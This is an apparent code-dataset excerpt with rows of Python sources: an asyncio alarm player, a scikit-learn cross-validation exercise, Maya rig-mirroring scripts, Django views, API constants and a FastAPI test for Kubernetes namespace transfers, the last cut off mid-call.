hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
40ea8ef48a928fd6d21055d76899ad88cae9f033 | 219 | py | Python | transparentai_ui/app/models/modules/__init__.py | Nathanlauga/transparentai-ui | e15455d869099319c4ab60787890c2079af66b75 | [
"MIT"
] | 1 | 2020-06-18T08:53:46.000Z | 2020-06-18T08:53:46.000Z | transparentai_ui/app/models/modules/__init__.py | Nathanlauga/transparentai-ui | e15455d869099319c4ab60787890c2079af66b75 | [
"MIT"
] | null | null | null | transparentai_ui/app/models/modules/__init__.py | Nathanlauga/transparentai-ui | e15455d869099319c4ab60787890c2079af66b75 | [
"MIT"
] | 1 | 2021-11-23T22:59:54.000Z | 2021-11-23T22:59:54.000Z | from .pandas_profiling import ModulePandasProfiling
from .bias import ModuleBias
from .performance import ModulePerformance
from .interpretability import ModuleInterpretability
from .sustainable import ModuleSustainable | 43.8 | 52 | 0.890411 | from .pandas_profiling import ModulePandasProfiling
from .bias import ModuleBias
from .performance import ModulePerformance
from .interpretability import ModuleInterpretability
from .sustainable import ModuleSustainable | 0 | 0 | 0 |
f7394d7f4e15ee910ea725c70f43bd24a29bff59 | 638 | py | Python | niescraper/alarm.py | elKei24/niescraper | d26c2b6df7f1fa29633d6356023802e41c38721c | [
"MIT"
] | null | null | null | niescraper/alarm.py | elKei24/niescraper | d26c2b6df7f1fa29633d6356023802e41c38721c | [
"MIT"
] | null | null | null | niescraper/alarm.py | elKei24/niescraper | d26c2b6df7f1fa29633d6356023802e41c38721c | [
"MIT"
] | null | null | null | import asyncio
import importlib.resources
import aioconsole
from playsound import playsound
import niescraper.resources
| 25.52 | 83 | 0.749216 | import asyncio
import importlib.resources
import aioconsole
from playsound import playsound
import niescraper.resources
async def play_alarm():
    """Play the bundled alarm sound on repeat while the event loop is alive.

    The sound is started non-blocking every 0.5s so cancellation of the
    surrounding task stops the loop promptly.
    """
    with importlib.resources.path(niescraper.resources, 'alarm.mp3') as alarm_file:
        loop = asyncio.get_running_loop()
        while loop.is_running():
            playsound(alarm_file, False)
            await asyncio.sleep(0.5)
async def play_alarm_until_input_async():
    """Start the alarm in the background and stop it once Enter is pressed."""
    background_alarm = asyncio.create_task(play_alarm())
    await aioconsole.ainput("Please press Enter to acknowledge alarm...")
    background_alarm.cancel()
def play_alarm_until_input():
    """Synchronous entry point: block and sound the alarm until Enter is pressed."""
    asyncio.run(play_alarm_until_input_async())
| 444 | 0 | 69 |
9fea2b873e177ec7678b8006a40ac7ca3d96746c | 2,691 | py | Python | Intermediate Machine Learning/Exercise 5.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | Intermediate Machine Learning/Exercise 5.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | Intermediate Machine Learning/Exercise 5.py | haoweii0215/Kaggle-Courses | 57974b2e6618b1125e030791320c649dda2fc783 | [
"MIT"
] | null | null | null | # Exercise 5 : Cross-Validation
## Set up code checking
import os
if not os.path.exists("../input/train.csv"):
os.symlink("../input/home-data-for-ml-course/train.csv", "../input/train.csv")
os.symlink("../input/home-data-for-ml-course/test.csv", "../input/test.csv")
from learntools.core import binder
binder.bind(globals())
from learntools.ml_intermediate.ex5 import *
print("Setup Complete")
import pandas as pd
from sklearn.model_selection import train_test_split
## Read the data
train_data = pd.read_csv('../input/train.csv', index_col='Id')
test_data = pd.read_csv('../input/test.csv', index_col='Id')
## Remove rows with missing target, separate target from predictors
train_data.dropna(axis=0, subset=['SalePrice'], inplace=True)
y = train_data.SalePrice
train_data.drop(['SalePrice'], axis=1, inplace=True)
## Select numeric columns only
numeric_cols = [cname for cname in train_data.columns if train_data[cname].dtype in ['int64', 'float64']]
X = train_data[numeric_cols].copy()
X_test = test_data[numeric_cols].copy()
## Step 1: Write a useful function
## In this exercise, you'll use cross-validation to select parameters for a machine learning model.
## Begin by writing a function get_score() that reports the average (over three cross-validation folds) MAE of a machine learning pipeline that uses:
## the data in X and y to create folds,
## SimpleImputer() (with all parameters left as default) to replace missing values, and
## RandomForestRegressor() (with random_state=0) to fit a random forest model.
## The n_estimators parameter supplied to get_score() is used when setting the number of trees in the random forest model.
## Answer:
## Step 2: Test different parameter values
## Now, you will use the function that you defined in Step 1 to evaluate the model performance corresponding to eight different values for the number of trees in the random forest: 50, 100, 150, ..., 300, 350, 400.
## Store your results in a Python dictionary results, where results[i] is the average MAE returned by get_score(i).
## Answer:
results = {}
for i in range(1,9):
results[50*i] = get_score(50*i)
## Step 3: Find the best parameter value
## Given the results, which value for n_estimators seems best for the random forest model? Use your answer to set the value of n_estimators_best.
## Answer:
n_estimators_best = min(results, key=results.get) | 43.403226 | 214 | 0.73913 | # Exercise 5 : Cross-Validation
## Set up code checking
import os
if not os.path.exists("../input/train.csv"):
os.symlink("../input/home-data-for-ml-course/train.csv", "../input/train.csv")
os.symlink("../input/home-data-for-ml-course/test.csv", "../input/test.csv")
from learntools.core import binder
binder.bind(globals())
from learntools.ml_intermediate.ex5 import *
print("Setup Complete")
import pandas as pd
from sklearn.model_selection import train_test_split
## Read the data
train_data = pd.read_csv('../input/train.csv', index_col='Id')
test_data = pd.read_csv('../input/test.csv', index_col='Id')
## Remove rows with missing target, separate target from predictors
train_data.dropna(axis=0, subset=['SalePrice'], inplace=True)
y = train_data.SalePrice
train_data.drop(['SalePrice'], axis=1, inplace=True)
## Select numeric columns only
numeric_cols = [cname for cname in train_data.columns if train_data[cname].dtype in ['int64', 'float64']]
X = train_data[numeric_cols].copy()
X_test = test_data[numeric_cols].copy()
## Step 1: Write a useful function
## In this exercise, you'll use cross-validation to select parameters for a machine learning model.
## Begin by writing a function get_score() that reports the average (over three cross-validation folds) MAE of a machine learning pipeline that uses:
## the data in X and y to create folds,
## SimpleImputer() (with all parameters left as default) to replace missing values, and
## RandomForestRegressor() (with random_state=0) to fit a random forest model.
## The n_estimators parameter supplied to get_score() is used when setting the number of trees in the random forest model.
## Answer:
def get_score(n_estimators):
    """Return the mean MAE over 3 cross-validation folds.

    The pipeline imputes missing values with defaults and fits a
    RandomForestRegressor with the given number of trees (random_state=0).
    """
    pipeline = Pipeline(steps=[
        ('preprocessor', SimpleImputer()),
        ('model', RandomForestRegressor(n_estimators, random_state=0)),
    ])
    # cross_val_score yields negated MAE; flip the sign back before averaging.
    fold_errors = -1 * cross_val_score(pipeline, X, y, cv=3,
                                       scoring='neg_mean_absolute_error')
    return fold_errors.mean()
## Step 2: Test different parameter values
## Now, you will use the function that you defined in Step 1 to evaluate the model performance corresponding to eight different values for the number of trees in the random forest: 50, 100, 150, ..., 300, 350, 400.
## Store your results in a Python dictionary results, where results[i] is the average MAE returned by get_score(i).
## Answer:
results = {}
for i in range(1,9):
results[50*i] = get_score(50*i)
## Step 3: Find the best parameter value
## Given the results, which value for n_estimators seems best for the random forest model? Use your answer to set the value of n_estimators_best.
## Answer:
n_estimators_best = min(results, key=results.get) | 282 | 0 | 22 |
a66eb3e3423ecbe7d1fa55c112056c2996c31103 | 7,210 | py | Python | modules/rig.py | Noorth34/barakaTools | c87361a284ab6b410f4957794d022cb07ea216ff | [
"CC0-1.0"
] | null | null | null | modules/rig.py | Noorth34/barakaTools | c87361a284ab6b410f4957794d022cb07ea216ff | [
"CC0-1.0"
] | null | null | null | modules/rig.py | Noorth34/barakaTools | c87361a284ab6b410f4957794d022cb07ea216ff | [
"CC0-1.0"
] | null | null | null | # coding:utf-8
# real mirror script
# 1) duplicate special ( world | input graph)
# 2) unparent offsets to world
# 3) create a null for each offset
# 4) match Translate each null on his respective offset
# 5) *(-1) translate X on each null
# 6) rotation 180° on Y and Z axis on each null
# 7) unparent offsets and reparent them correctly
# 8) reorient CTRLS' shapes
# /|\
# / ! \ *(-1) translate X on each null joint
#
# MIRROR RIG MODULES
sel = cmds.ls(sl=True, ap=True)
duplicata = cmds.duplicate(sel, returnRootsOnly=False, rc=True, upstreamNodes=True)
# rename ALL nodes ; both DAG and DG nodes
renamed_duplicata = []
for node in duplicata:
renamed_node = cmds.rename(node, node.replace("_L", "_R").rstrip("1"))
renamed_duplicata.append(renamed_node)
# Save constraint structure
constraints_list = []
for node in renamed_duplicata:
if cmds.objectType(node) in ["parentConstraint", "orientConstraint", "scaleConstraint", "aimConstraint"]:
constraints_list.append(node)
if constraints_list:
constraint = {}
for constr in constraints_list:
constraint[constr] = {}
constraint[constr]["type"] = cmds.objectType(constr)
id = 0
constraint[constr]["source"] = None
while not constraint[constr]["source"]:
constraint[constr]["source"] = cmds.listConnections(constr+".target[{}].targetParentMatrix".format(id), s=True, d=False)
id += 1
constraint[constr]["source"] = constraint[constr]["source"][0]
dest_tx = cmds.listConnections("{}.constraintTranslateX".format(constr), s=False, d=True)[0]
dest_ty = cmds.listConnections("{}.constraintTranslateY".format(constr), s=False, d=True)[0]
dest_tz = cmds.listConnections("{}.constraintTranslateZ".format(constr), s=False, d=True)[0]
dest_rx = cmds.listConnections("{}.constraintRotateX".format(constr), s=False, d=True)[0]
dest_ry = cmds.listConnections("{}.constraintRotateY".format(constr), s=False, d=True)[0]
dest_rz = cmds.listConnections("{}.constraintRotateZ".format(constr), s=False, d=True)[0]
if dest_tx == dest_ty and dest_ty == dest_tz:
constraint[constr]["destination"] = dest_tx
elif dest_rx == dest_ry and dest_ry == dest_rz:
constraint[constr]["destination"] = dest_rx
offset_tr = cmds.getAttr("{}.target[0].targetOffsetTranslate".format(constr))[0]
offset_rot = cmds.getAttr("{}.target[0].targetOffsetRotate".format(constr))[0]
if offset_tr == (0, 0, 0) and offset_rot == (0, 0, 0):
constraint[constr]["maintain_offset"] = False
else:
constraint[constr]["maintain_offset"] = True
cmds.delete(constr)
# Work only with DAG nodes
cmds.select(renamed_duplicata[0:len(sel)], hierarchy=True)
dagNodes_list = cmds.ls(sl=True, shapes=False)
# filter shapes because maya sucks
for id, node in enumerate(dagNodes_list):
if cmds.objectType(node, isType="nurbsCurve") == True:
dagNodes_list.pop(id)
dagParent = {}
for node in dagNodes_list:
parent = cmds.listRelatives(node, parent=True)[0]
dagParent[node] = parent
if cmds.objectType(node, isType="joint") and node.startswith("null_"):
jpos_x, jpos_y, jpos_z = cmds.xform(node, q=True, t=True, objectSpace=True)
for node in dagNodes_list:
cmds.parent(node, world=True)
for node in dagNodes_list:
pos_x, pos_y, pos_z = cmds.xform(node, q=True, t=True)
rot_x, rot_y, rot_z = cmds.xform(node, q=True, ro=True)
global_move = cmds.createNode("transform", n="temp_mirror")
cmds.xform(global_move, t=[pos_x, pos_y, pos_z])
cmds.parent(node, global_move)
cmds.xform(global_move, t=[-pos_x, pos_y, pos_z])
cmds.xform(global_move, ro=[0, 180, 180])
cmds.parent(node, w=True)
cmds.delete(global_move)
for node in dagNodes_list:
cmds.parent(node, dagParent[node])
if cmds.objectType(node, isType="joint"):
if node.startswith("null_"):
cmds.xform(node, t=[-jpos_x, jpos_y, jpos_z])
cmds.setAttr("{}.jointOrientX".format(node), 0)
cmds.setAttr("{}.jointOrientY".format(node), 0)
cmds.setAttr("{}.jointOrientZ".format(node), 0)
# redo constraints
if constraints_list:
for i in constraints_list:
if constraint[i]["type"] == "parentConstraint":
cmds.parentConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
elif constraint[i]["type"] == "orientConstraint":
cmds.orientConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
elif constraint[i]["type"] == "scaleConstraint":
cmds.scaleConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
# elif constraint[i]["type"] == "aimConstraint":
# cmds.aimConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
# MIRROR POSITION AND ROTATION
# MIRROR SHAPES
if not sel:
sel = cmds.ls(sl=True, ap=True)
if not sel:
cmds.error("Any selection. Please select curves")
for transform in sel:
shapes_list = cmds.listRelatives(transform, shapes=True, path=True)
for shape in shapes_list:
if cmds.objectType(shape, isType="nurbsCurve"):
cv_number = cmds.getAttr("{}.spans".format(shape))
for id in range(cv_number):
cv_x = cmds.getAttr("{}.controlPoints[{}].xValue".format(shape, id))
cv_y = cmds.getAttr("{}.controlPoints[{}].yValue".format(shape, id))
cv_z = cmds.getAttr("{}.controlPoints[{}].zValue".format(shape, id))
cmds.setAttr("{}.controlPoints[{}].xValue".format(shape, id), cv_x)
cmds.setAttr("{}.controlPoints[{}].yValue".format(shape, id), (-1)*cv_y)
cmds.setAttr("{}.controlPoints[{}].zValue".format(shape, id), (-1)*cv_z)
| 32.331839 | 123 | 0.697642 | # coding:utf-8
# real mirror script
# 1) duplicate special ( world | input graph)
# 2) unparent offsets to world
# 3) create a null for each offset
# 4) match Translate each null on his respective offset
# 5) *(-1) translate X on each null
# 6) rotation 180° on Y and Z axis on each null
# 7) unparent offsets and reparent them correctly
# 8) reorient CTRLS' shapes
# /|\
# / ! \ *(-1) translate X on each null joint
#
# MIRROR RIG MODULES
sel = cmds.ls(sl=True, ap=True)
duplicata = cmds.duplicate(sel, returnRootsOnly=False, rc=True, upstreamNodes=True)
# rename ALL nodes ; both DAG and DG nodes
renamed_duplicata = []
for node in duplicata:
renamed_node = cmds.rename(node, node.replace("_L", "_R").rstrip("1"))
renamed_duplicata.append(renamed_node)
# Save constraint structure
constraints_list = []
for node in renamed_duplicata:
if cmds.objectType(node) in ["parentConstraint", "orientConstraint", "scaleConstraint", "aimConstraint"]:
constraints_list.append(node)
if constraints_list:
constraint = {}
for constr in constraints_list:
constraint[constr] = {}
constraint[constr]["type"] = cmds.objectType(constr)
id = 0
constraint[constr]["source"] = None
while not constraint[constr]["source"]:
constraint[constr]["source"] = cmds.listConnections(constr+".target[{}].targetParentMatrix".format(id), s=True, d=False)
id += 1
constraint[constr]["source"] = constraint[constr]["source"][0]
dest_tx = cmds.listConnections("{}.constraintTranslateX".format(constr), s=False, d=True)[0]
dest_ty = cmds.listConnections("{}.constraintTranslateY".format(constr), s=False, d=True)[0]
dest_tz = cmds.listConnections("{}.constraintTranslateZ".format(constr), s=False, d=True)[0]
dest_rx = cmds.listConnections("{}.constraintRotateX".format(constr), s=False, d=True)[0]
dest_ry = cmds.listConnections("{}.constraintRotateY".format(constr), s=False, d=True)[0]
dest_rz = cmds.listConnections("{}.constraintRotateZ".format(constr), s=False, d=True)[0]
if dest_tx == dest_ty and dest_ty == dest_tz:
constraint[constr]["destination"] = dest_tx
elif dest_rx == dest_ry and dest_ry == dest_rz:
constraint[constr]["destination"] = dest_rx
offset_tr = cmds.getAttr("{}.target[0].targetOffsetTranslate".format(constr))[0]
offset_rot = cmds.getAttr("{}.target[0].targetOffsetRotate".format(constr))[0]
if offset_tr == (0, 0, 0) and offset_rot == (0, 0, 0):
constraint[constr]["maintain_offset"] = False
else:
constraint[constr]["maintain_offset"] = True
cmds.delete(constr)
# Work only with DAG nodes
cmds.select(renamed_duplicata[0:len(sel)], hierarchy=True)
dagNodes_list = cmds.ls(sl=True, shapes=False)
# filter shapes because maya sucks
for id, node in enumerate(dagNodes_list):
if cmds.objectType(node, isType="nurbsCurve") == True:
dagNodes_list.pop(id)
dagParent = {}
for node in dagNodes_list:
parent = cmds.listRelatives(node, parent=True)[0]
dagParent[node] = parent
if cmds.objectType(node, isType="joint") and node.startswith("null_"):
jpos_x, jpos_y, jpos_z = cmds.xform(node, q=True, t=True, objectSpace=True)
for node in dagNodes_list:
cmds.parent(node, world=True)
for node in dagNodes_list:
pos_x, pos_y, pos_z = cmds.xform(node, q=True, t=True)
rot_x, rot_y, rot_z = cmds.xform(node, q=True, ro=True)
global_move = cmds.createNode("transform", n="temp_mirror")
cmds.xform(global_move, t=[pos_x, pos_y, pos_z])
cmds.parent(node, global_move)
cmds.xform(global_move, t=[-pos_x, pos_y, pos_z])
cmds.xform(global_move, ro=[0, 180, 180])
cmds.parent(node, w=True)
cmds.delete(global_move)
for node in dagNodes_list:
cmds.parent(node, dagParent[node])
if cmds.objectType(node, isType="joint"):
if node.startswith("null_"):
cmds.xform(node, t=[-jpos_x, jpos_y, jpos_z])
cmds.setAttr("{}.jointOrientX".format(node), 0)
cmds.setAttr("{}.jointOrientY".format(node), 0)
cmds.setAttr("{}.jointOrientZ".format(node), 0)
# redo constraints
if constraints_list:
for i in constraints_list:
if constraint[i]["type"] == "parentConstraint":
cmds.parentConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
elif constraint[i]["type"] == "orientConstraint":
cmds.orientConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
elif constraint[i]["type"] == "scaleConstraint":
cmds.scaleConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
# elif constraint[i]["type"] == "aimConstraint":
# cmds.aimConstraint(constraint[i]["source"], constraint[i]["destination"], mo= constraint[i]["maintain_offset"])
# MIRROR POSITION AND ROTATION
def mirror_object(objects_list=None, axis="x"):
    """Mirror each given transform across a world axis.

    Args:
        objects_list: transform name or list of transform names to mirror.
        axis: world axis to mirror across, one of "x", "y" or "z".

    Raises a Maya error if no objects are given or the axis is unknown.
    """
    if not objects_list:
        cmds.error("No objects passed for mirror.")
    # Accept a single object name as well as a list (the original
    # `if objects_list not type(list)` check was a syntax error and
    # referenced an undefined name).
    if not isinstance(objects_list, list):
        objects_list = [objects_list]
    # axis -> (per-component translate sign, compensating rotation)
    mirror_settings = {
        "x": ((-1, 1, 1), [0, 180, 180]),
        "y": ((1, -1, 1), [180, 0, 180]),
        "z": ((1, 1, -1), [180, 180, 0]),
    }
    if axis not in mirror_settings:
        cmds.error("Unknown mirror axis: {}".format(axis))
    signs, compensation = mirror_settings[axis]
    for obj in objects_list:
        pos = cmds.xform(obj, q=True, t=True)
        # Parent under a throwaway transform placed at the object's position,
        # then move/rotate that parent so the child lands mirrored.
        global_move = cmds.createNode("transform", n="temp_mirror")
        cmds.xform(global_move, t=pos)
        cmds.parent(obj, global_move)
        cmds.xform(global_move, t=[p * s for p, s in zip(pos, signs)])
        cmds.xform(global_move, ro=compensation)
        cmds.parent(obj, w=True)
        cmds.delete(global_move)
# MIRROR SHAPES
def mirror_curve_shape(sel=None):
    """Mirror the nurbsCurve shapes of the given transforms in local Y/Z.

    Args:
        sel: list of transform names; when empty, falls back to the current
            selection. Raises a Maya error if nothing is selected.

    Each control point keeps its X value and has its Y and Z values negated.
    """
    # The original `def` line was missing its colon and the type check
    # (`if sel not type(list)`) was a syntax error; both fixed here.
    if sel is None:
        sel = []
    if not isinstance(sel, list):
        cmds.error("{} passed. Must pass selection list".format(type(sel)))
    if not sel:
        sel = cmds.ls(sl=True, ap=True)
    if not sel:
        cmds.error("No selection. Please select curves")
    for transform in sel:
        shapes_list = cmds.listRelatives(transform, shapes=True, path=True)
        for shape in shapes_list:
            if cmds.objectType(shape, isType="nurbsCurve"):
                cv_number = cmds.getAttr("{}.spans".format(shape))
                for id in range(cv_number):
                    cv_y = cmds.getAttr("{}.controlPoints[{}].yValue".format(shape, id))
                    cv_z = cmds.getAttr("{}.controlPoints[{}].zValue".format(shape, id))
                    # X is deliberately left untouched; the mirror only flips Y/Z.
                    cmds.setAttr("{}.controlPoints[{}].yValue".format(shape, id), (-1)*cv_y)
                    cmds.setAttr("{}.controlPoints[{}].zValue".format(shape, id), (-1)*cv_z)
def hook_legacy():
    """Create a 'hook' transform driven by the first selected node and
    reparent the last selected node under it.

    The hook follows the driver via parent and scale constraints and is
    inserted at the target's original place in the hierarchy.
    """
    selection = cmds.ls(sl=True, ap=True)
    driver = selection[0]
    target = selection[-1]
    hook = cmds.createNode("transform", n="hook_{}_for_{}".format(driver, target))
    # Colour the hook cyan in the outliner so it stands out.
    cmds.setAttr("{}.useOutlinerColor".format(hook), 1)
    cmds.setAttr("{}.outlinerColorR".format(hook), 0)
    cmds.setAttr("{}.outlinerColorG".format(hook), 1)
    cmds.setAttr("{}.outlinerColorB".format(hook), 1)
    cmds.parentConstraint(driver, hook, mo=False)
    cmds.scaleConstraint(driver, hook, mo=False)
    original_parent = cmds.listRelatives(target, parent=True, path=True)
    cmds.parent(target, hook)
    if original_parent:
        cmds.parent(hook, original_parent[0])
2fdcf9b4a72c56e2caf1881dd37ca30b320f2f35 | 318 | py | Python | api/constants.py | Xavier-Cliquennois/ac-mediator | ce55b65ab7f4532fc11fbb2f994518c60240bfdc | [
"Apache-2.0"
] | 9 | 2016-11-17T08:04:01.000Z | 2020-09-10T05:58:36.000Z | api/constants.py | Xavier-Cliquennois/ac-mediator | ce55b65ab7f4532fc11fbb2f994518c60240bfdc | [
"Apache-2.0"
] | 23 | 2016-10-26T14:43:55.000Z | 2021-06-10T20:02:38.000Z | api/constants.py | Xavier-Cliquennois/ac-mediator | ce55b65ab7f4532fc11fbb2f994518c60240bfdc | [
"Apache-2.0"
] | 3 | 2018-03-03T12:07:28.000Z | 2020-08-02T12:54:31.000Z | QUERY_PARAM_QUERY = 'q'
QUERY_PARAM_SORT = 's'
QUERY_PARAM_FILTER = 'f'
QUERY_PARAM_SIZE = 'size'
QUERY_PARAM_PAGE = 'page'
QUERY_PARAM_FIELDS = 'fields'
QUERY_PARAM_OFFSET = 'offset'
QUERY_PARAM_INCLUDE = 'include'
QUERY_PARAM_EXCLUDE = 'exclude'
QUERY_PARAM_WAIT_UNTIL_COMPLETE = 'wuc'
QUERY_PARAM_FORMAT = 'format'
# Canonical query-string parameter names accepted by the API endpoints.
QUERY_PARAM_QUERY = 'q'
QUERY_PARAM_SORT = 's'
QUERY_PARAM_FILTER = 'f'
QUERY_PARAM_SIZE = 'size'
QUERY_PARAM_PAGE = 'page'
QUERY_PARAM_FIELDS = 'fields'
QUERY_PARAM_OFFSET = 'offset'
QUERY_PARAM_INCLUDE = 'include'
QUERY_PARAM_EXCLUDE = 'exclude'
QUERY_PARAM_WAIT_UNTIL_COMPLETE = 'wuc'
QUERY_PARAM_FORMAT = 'format'
| 0 | 0 | 0 |
5dad6baf371de22cb47baf42c155ab90f5fc6fbb | 780 | py | Python | read/views.py | MaryMbugua/Tusome | 4a6b8bf20644953977d91cda6ad299d12b93a934 | [
"MIT"
] | 1 | 2018-06-25T20:22:31.000Z | 2018-06-25T20:22:31.000Z | read/views.py | MaryMbugua/Tusome | 4a6b8bf20644953977d91cda6ad299d12b93a934 | [
"MIT"
] | null | null | null | read/views.py | MaryMbugua/Tusome | 4a6b8bf20644953977d91cda6ad299d12b93a934 | [
"MIT"
] | null | null | null | from django.shortcuts import render,redirect
from django.http import HttpResponse,Http404,HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from .models import Enquiry,Vitabu
from .forms import EnquiryForm
# Create your views here. | 30 | 65 | 0.7 | from django.shortcuts import render,redirect
from django.http import HttpResponse,Http404,HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from .models import Enquiry,Vitabu
from .forms import EnquiryForm
# Create your views here.
def welcome(request):
    """Landing page: render the index template with every available book."""
    all_books = Vitabu.objects.all()
    return render(request, 'index.html', {"books": all_books})
def about(request):
    """Render the static about page."""
    return render(request,'about.html')
def contribute(request):
    """Render the contribution form and persist a submitted enquiry.

    On GET, an unbound form is shown. On POST, the form is bound to the
    submitted data/files and saved when valid; an invalid form is
    re-rendered with its errors.
    """
    if request.method == 'POST':
        # Bind the form to the request data only for POSTs; the original
        # bound it unconditionally and then threw the bound form away on GET.
        form = EnquiryForm(request.POST, request.FILES)
        if form.is_valid():
            enquiry = form.save()
            enquiry.save()
            print("Message succesfully sent!")
    else:
        form = EnquiryForm()
    return render(request, 'contribute.html', {"form": form})
049ab880e018f48145c50061ce27bad3fd3238f4 | 22,531 | py | Python | src/tests/test_namespace2projecttransfer.py | scraiber/scraiber-api | 010d0875ba0820e0ec7790d74df8a2955fac360e | [
"Apache-2.0"
] | 1 | 2022-03-29T06:41:41.000Z | 2022-03-29T06:41:41.000Z | src/tests/test_namespace2projecttransfer.py | scraiber/scraiber-api | 010d0875ba0820e0ec7790d74df8a2955fac360e | [
"Apache-2.0"
] | null | null | null | src/tests/test_namespace2projecttransfer.py | scraiber/scraiber-api | 010d0875ba0820e0ec7790d74df8a2955fac360e | [
"Apache-2.0"
] | null | null | null | import time
import uuid
from kubernetes import client, config
import os
from fastapi.testclient import TestClient
import json
from typing import List
from pydantic import EmailStr
from fastapi import HTTPException
from app.api.models.auth0 import Auth0User
from .helper_functions import (
generate_user,
generate_project,
generate_namespace
)
from app.main import app
from app.auth0 import current_user
cluster_name = json.loads(os.environ['CLUSTER_DICT'])["EU1"]["Config-Name"]
config.load_kube_config("config.yaml", context=cluster_name)
v1 = client.CoreV1Api()
rbac = client.RbacAuthorizationV1Api()
user1 = generate_user()
user2 = generate_user()
user3 = generate_user()
user_list1 = [user1, user2, user3]
namespace_blacklist = generate_namespace()
namespace_blacklist.update({"name": "default"})
namespace1 = generate_namespace()
namespace2 = generate_namespace()
namespace3 = generate_namespace()
project = generate_project()
project2 = generate_project()
project3 = generate_project()
| 53.014118 | 130 | 0.712441 | import time
import uuid
from kubernetes import client, config
import os
from fastapi.testclient import TestClient
import json
from typing import List
from pydantic import EmailStr
from fastapi import HTTPException
from app.api.models.auth0 import Auth0User
from .helper_functions import (
generate_user,
generate_project,
generate_namespace
)
from app.main import app
from app.auth0 import current_user
cluster_name = json.loads(os.environ['CLUSTER_DICT'])["EU1"]["Config-Name"]
config.load_kube_config("config.yaml", context=cluster_name)
v1 = client.CoreV1Api()
rbac = client.RbacAuthorizationV1Api()
user1 = generate_user()
user2 = generate_user()
user3 = generate_user()
user_list1 = [user1, user2, user3]
namespace_blacklist = generate_namespace()
namespace_blacklist.update({"name": "default"})
namespace1 = generate_namespace()
namespace2 = generate_namespace()
namespace3 = generate_namespace()
async def get_user_by_email(email: EmailStr) -> Auth0User:
    """Test stand-in: return the stub user with the given e-mail or raise 404."""
    match = next((u for u in user_list1 if u.email == email), None)
    if match is None:
        raise HTTPException(status_code=404, detail="User could not be retrieved")
    return match
async def get_user_by_id(id: str) -> Auth0User:
    """Test stand-in: return the stub user with the given id or raise 404."""
    match = next((u for u in user_list1 if u.user_id == id), None)
    if match is None:
        raise HTTPException(status_code=404, detail="User could not be retrieved")
    return match
async def get_user_list_by_id(id_list: List[str], require_200_status_code: bool = False) -> List[Auth0User]:
    """Test stand-in: return the stub users whose ids appear in id_list.

    `require_200_status_code` mirrors the real API's signature and is unused here.
    """
    return [user for user in user_list1 if user.user_id in id_list]
project = generate_project()
project2 = generate_project()
project3 = generate_project()
def test_transfer_candidate_add(client: TestClient, session, monkeypatch):
    """End-to-end test of POST /namespace2projecttransfer/ (propose a transfer).

    Builds three projects and three namespaces, then exercises every error
    branch (unverified e-mail, non-admin caller, unknown target project,
    unknown namespace, namespace not in source project) before confirming two
    successful transfer candidates are recorded without moving the namespaces.
    """
    # Replace the Auth0 lookups with the module-level stubs.
    monkeypatch.setattr("app.api.routes.user_management.get_user_by_email", get_user_by_email)
    monkeypatch.setattr("app.api.routes.user_management.get_user_by_id", get_user_by_id)
    monkeypatch.setattr("app.api.routes.namespaces.get_user_by_id", get_user_by_id)
    monkeypatch.setattr("app.api.routes.namespaces.get_user_list_by_id", get_user_list_by_id)
    monkeypatch.setattr("app.api.routes.namespace2projecttransfer.get_user_list_by_id", get_user_list_by_id)
    #create project 1
    app.dependency_overrides[current_user] = lambda: user1
    response = client.post('projects/', data=json.dumps(project))
    project.update({"project_id": response.json()["project_id"]})
    #create project 2
    response = client.post('projects/', data=json.dumps(project2))
    project2.update({"project_id": response.json()["project_id"]})
    # create project 3
    response = client.post('projects/', data=json.dumps(project3))
    project3.update({"project_id": response.json()["project_id"]})
    # invite user2 to project 1 and user3 to project 2
    response = client.post('project_user_management/',
                           data=json.dumps({"project_id": project["project_id"], "e_mail": user2.email}))
    response = client.post('project_user_management/',
                           data=json.dumps({"project_id": project2["project_id"], "e_mail": user3.email}))
    # invited users accept their invitations
    app.dependency_overrides[current_user] = lambda: user2
    response = client.post('project_user_management/accept_user_invitation',
                           data=json.dumps({"project_id": project["project_id"]}))
    app.dependency_overrides[current_user] = lambda: user3
    response = client.post('project_user_management/accept_user_invitation',
